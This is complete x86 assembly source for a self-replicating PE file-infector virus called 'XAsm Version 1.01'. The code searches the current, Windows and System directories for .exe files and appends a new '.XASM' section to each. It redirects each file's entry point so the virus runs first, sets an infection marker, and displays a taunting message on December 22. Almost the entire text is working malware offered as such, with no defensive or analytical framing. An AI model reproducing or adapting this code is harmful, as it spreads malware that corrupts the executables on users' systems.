XAsm Version 1.01(PE Virus)

;==============================================
; XAsm Version 1.01
;==============================================
; PE Virus * ^_^ * , too easy
;==============================================
; not keep in memory,but when set the debug
; mode is false,the virus will infect PE exe
; files in %WINDOWS% & %SYSTEM% Directory!
;==============================================
; host program
.386
locals
jumps
.model flat,stdcall
include ..\\Include\\win32.inc
;Defined the Marco
TRUE = 1
FALSE = 0
;===============================================
; Debug Mode or Release Mode
;===============================================
DEBUG =TRUE
;===============================================
L equ <LARGE>
;define some functions
extrn GetModuleHandleA : proc
extrn MessageBoxA : proc
extrn ExitProcess : proc
;host body
.data
szMsg db \'XAsm Ready!\',0
szCaption db \'Message\',0
.code
host_start:
; get module handle ( call kernel32.dll )
push L 0
call GetModuleHandleA
; show message
push 1000h
lea eax,szCaption
push eax
lea eax,szMsg
push eax
push 0
call MessageBoxA
; exit host
push L 0
call ExitProcess
ends
;=====================================================
; my cute virus from here
;=====================================================
vseg segment para use32 \'XASM\'
assume cs : vseg
; virus body
vstart:
mov ecx,ebp ; save the ebp
mov edx,esp ; save the esp
call reloc
reloc:
pop ebp
mov eax,ebp
sub ebp,offset reloc ; get offset
sub eax,reloc-vstart
sub eax,oldoffset[ebp] ; calculate jump back to host address
mov jmpbacktemp[ebp],eax ; save jump back host address
mov oldesp[ebp],edx ; save old esp
mov oldebp[ebp],ecx ; save old ebp
; begin to cmp wether kernel32.dll in Memory ?
mov eax,krnl32[ebp]
cmp dword ptr [eax],081EC8B55h ; if in memory ?
jnz run_host   ; no in then go to run host
; cmp Okey! the kernel32.dll has been loaded in memory !
lea eax,CurrentDir[ebp]
push eax
push L 256
call getcurrentdirectory
mov RestoreDir[ebp],eax
jmp start_find_file
; Get Window dir
Get_Window_Dir:
push 256
lea eax,DirTemp[ebp]
push eax
call getwindowdirectory
mov windir[ebp],1
;                        
; for debug: change system to d:\\windows
IF DEBUG
inc byte ptr DirTemp[ebp]
ENDIF
;                        
jmp set_dir
; Get Windows\\System dir
Get_System_Dir:
push 256
lea eax,DirTemp[ebp]
push eax
call getsystemdirectory
mov sysdir[ebp],1
;                        
; for debug: change system to d:\\windows\\system
IF DEBUG  
inc byte ptr DirTemp[ebp]
ENDIF
;                        
set_dir:
lea eax,DirTemp[ebp]
push eax
call setcurrentdirectory
start_find_file:
lea eax,WIN32_FIND_DATA[ebp]
push eax
lea eax,findfilter[ebp]
push eax
call findfirstfile
mov searchhandle[ebp],eax
cmp eax,-1
jz run_host
jmp infectfile
no_aim:
push filehandle[ebp]
call closehandle
gonext:
lea eax,WIN32_FIND_DATA[ebp]
push eax
push searchhandle[ebp]
call findnextfile
or eax,eax
jnz infectfile
cmp windir[ebp],1
jnz Get_Window_Dir
cmp sysdir[ebp],1
jnz Get_System_Dir
jmp run_host
infectfile:
push 0   ; temphandle
push fileattr[ebp] ; file attrib
push 3   ; file exist
push 0   ; secturity NULL
push 0   ; share mode
push 80000000h+40000000h; read + write
lea eax,fullname[ebp]
push eax  ; pWin32_find_data struct
call createfile
mov filehandle[ebp],eax
cmp eax,-1
jz gonext
; read offset of pe sign
push 0
push 0
push 3ch
push filehandle[ebp]
call setfilepointer
; read [3c] dword pe offset
push 0
lea eax,bytesread[ebp]
push eax
push 4
lea eax,peoffset[ebp]
push eax
push filehandle[ebp]
call readfile
or eax,eax
jz gonext
; set file pointer to pe offset
push 0
push 0
push peoffset[ebp]
push filehandle[ebp]
call setfilepointer
; read pe header
push 0
lea eax,bytesread[ebp]
push eax
push 58h
lea eax,peheader[ebp]
push eax
push filehandle[ebp]
call readfile
or eax,eax
jz no_aim
; check file
cmp dword ptr peheader[ebp],4550h
jnz no_aim    ; if PE format? yes then infect
cmp word ptr peheader[ebp+1ah],0AEAEh  
jz no_aim    ; if infected? yes then find next
; check ok will be infect it!
; go back the pe offset and read the whole pe header
push 0
push 0
push peoffset[ebp]
push filehandle[ebp]
call setfilepointer
push 0
lea eax,bytesread[ebp]
push eax
push headersize[ebp]
lea eax,peheader[ebp]
push eax
push filehandle[ebp]
call readfile
or eax,eax
jz no_aim
mov word ptr peheader[ebp+1ah],0AEAEh ; set infected flag
;local the obj table entry
xor eax,eax
mov ax,NtHeaderSize[ebp]
add eax,18h
mov objtableoffset[ebp],eax
lea eax,peheader[ebp]
add objtableoffset[ebp],eax
;end local
xor eax,eax
xor edx,edx
mov ax,numobj[ebp]
mov ecx,40
mul ecx  ; edx: eax save the offset of my section entry
mov esi,objtableoffset[ebp]
add esi,eax  ; esi save the my offset of section entry in memory
inc word ptr numobj[ebp]
lea edi,newobject[ebp] ;
;                        
; esi: the offset of my section entry in memory
; edi: the offset of newobject made by me
;                        
;calculate the My section RAV value
mov eax,[esi-40+8] ; virtual size of last section
add eax,[esi-40+12] ; add virtual entry of last section
; align with the align mode
mov ecx,objalign[ebp]
xor edx,edx
div ecx
inc eax
mul ecx
mov RVA[ebp],eax
; set the virtual size
xor edx,edx
mov eax,vend-vstart+1000h
div ecx
inc eax
mul ecx
mov virtualsize[ebp],eax
;set the physical size
mov ecx,filealign[ebp]
xor edx,edx
mov eax,static_data_end-vstart
div ecx
inc eax
mul ecx
mov physicalsize[ebp],eax
;calculate the physical offset
mov eax,[esi-40+16]
add eax,[esi-40+20]
xor edx,edx
div ecx
inc eax
mul ecx
mov physicaloffset[ebp],eax
;Update the imagesize
mov ecx,objalign[ebp]
mov eax,imagesize[ebp]
add eax,vstart-vend+1000h
div ecx
inc eax
mul ecx
mov imagesize[ebp],eax
; copy the new object to pe header
xchg esi,edi
mov ecx,10
rep movsd
; calculate the RAV , to make my cute virus run first! ^o^
mov eax,RVA[ebp]
mov ebx,entrypointRVA[ebp]
mov entrypointRVA[ebp],eax
sub eax,ebx
mov oldoffset[ebp],eax
; go back to the pe start
push 0
push 0
push peoffset[ebp]
push filehandle[ebp]
call setfilepointer
; write the modifid PE header
push 0
lea eax,bytesread[ebp]
push eax
push headersize[ebp]
lea eax,peheader[ebp]
push eax
push filehandle[ebp]
call writefile
; set file pointer to the my section\'s physical entry address
; and write my cute virus into file
push 0
push 0
push physicaloffset[ebp]
push filehandle[ebp]
call setfilepointer
; begin to write
push 0
lea eax,bytesread[ebp]
push eax
push static_data_end-vstart+1
lea eax,vstart[ebp]
push eax
push filehandle[ebp]
call writefile
;close handle
push filehandle[ebp]
call closehandle
run_host:
;                    
; check trigger?
lea eax,systime[ebp]
push eax
call gettime
cmp word ptr month[ebp],12
jnz no_trigger
cmp word ptr day[ebp],22
jnz no_trigger
; show message (trigger???) kinding man? ^o^
mov eax,user[ebp]    
cmp dword ptr [eax],08BEC8B55h  
jnz no_trigger
push 1000h
lea eax,szvCaption[ebp]
push eax
lea eax,szvMsg[ebp]
push eax
push 0
call msgbox
no_trigger:
;                    
; return the host
cmp RestoreDir[ebp],0
jz go_host
lea eax,CurrentDir[ebp]
push eax
call setcurrentdirectory
go_host:
mov eax,jmpbacktemp[ebp]
mov esp,oldesp[ebp]
mov ebp,oldebp[ebp]
jmp eax
;                      
;                      
;call_table
msgbox:
mov jumptemp[ebp],0BFF541BAh
jmp jumptemp[ebp]
findfirstfile:
mov jumptemp[ebp],0BFF77BD7h
jmp jumptemp[ebp]
findnextfile:
mov jumptemp[ebp],0BFF77C0Fh
jmp jumptemp[ebp]
closehandle:
mov jumptemp[ebp],0BFF7E2D9h
jmp jumptemp[ebp]  
createfile:
mov jumptemp[ebp],0BFF77B5Bh
jmp jumptemp[ebp]
setfilepointer:
mov jumptemp[ebp],0BFF771BBh
jmp jumptemp[ebp]
readfile:
mov jumptemp[ebp],0BFF770B9h
jmp jumptemp[ebp]
writefile:
mov jumptemp[ebp],0BFF77051h
jmp jumptemp[ebp]
gettime:
mov jumptemp[ebp],0BFFA1372h
jmp jumptemp[ebp]
getcurrentdirectory:
mov jumptemp[ebp],0BFF77A55h
jmp jumptemp[ebp]
getsystemdirectory:
mov jumptemp[ebp],0BFF779C2h
jmp jumptemp[ebp]
getwindowdirectory:
mov jumptemp[ebp],0BFF779F8h
jmp jumptemp[ebp]
setcurrentdirectory:
mov jumptemp[ebp],0BFF77A2Eh
jmp jumptemp[ebp]
;                      
;======================================================================
; static data for need
;                                    
static_data_start:
;                  
oldoffset dd 2000h
jmpbacktemp dd 0
krnl32  dd 0BFF84E4Dh
user  dd 0BFF53FF0h
findfilter db \'*.exe\',0
bytesread dd 0
peoffset dd 0
objtableoffset dd 0
szvCaption db \'Note For You\',0
szvMsg  db \' Happy Day, isnt it? Be careful!\',0dh,0ah
  db \'Virus will be with YOU! ^o^\',0dh,0ah,0dh,0ah
  db \' From [ XASM ] Ver 1.01\',0
;                  
; static struct
;new object
newobject:
oname  db \'.XASM\',0,0,0
virtualsize dd 0
RVA  dd 0
physicalsize dd 0
physicaloffset dd 0
reversed dd 0,0,0
objectflags db 40h,0,0,0c0h ; code flag
; end of new object
;                  
static_data_end:
;                                    
; dynanic data for need
;                                    
memory_data_start:
;          -
windir  dd 0
sysdir  dd 0
RestoreDir dd 0
oldesp  dd 0
oldebp  dd 0
searchhandle dd 0
filehandle dd 0
jumptemp dd 0
CurrentDir db 256 dup (0)
DirTemp  db 256 dup (0)
;                     -
; some structs
;                     -
; SYSTIME struct
systime:
year  dw 0
month  dw 0
dayofweek dw 0
day  dw 0
   dw 0,0,0,0
; end of struct
;here defined WIN32_FIND_DATA struct
WIN32_FIND_DATA:
fileattr dd 0
createtime dd 0,0
lastaccesstime dd 0,0
lastwritetime dd 0,0
filesize dd 0,0
resv  dd 0,0
fullname db 256 dup (0)
realname db 256 dup(0)
;end of WIN32_FIND_DATA struct
;defined pe header buffer
peheader:
signature dd 0  ; sign of PE: \'PE00\'
cputype  dw 0  ; cpu type sign
numobj  dw 0  ; num of Object
   db 3*4 dup (0) ; no use for us
NtHeaderSize dw 0  ; option header size
Flags  dw 0  ; characteristics
   db 4*4 dup (0) ; no use
entrypointRVA dd 0  ; entry point
   db 3*4 dup (0) ; no use
objalign dd 0  ; objects align mode
filealign dd 0  ; file align mode
   db 4*4 dup (0) ; no use
imagesize dd 0  ; image size
headersize dd 0  ; image header size
;                      
vend:
db 1000h dup(0)  ; the other pe header bytes will read to here
;          -
memory_data_end:
;                                    
ends
end vstart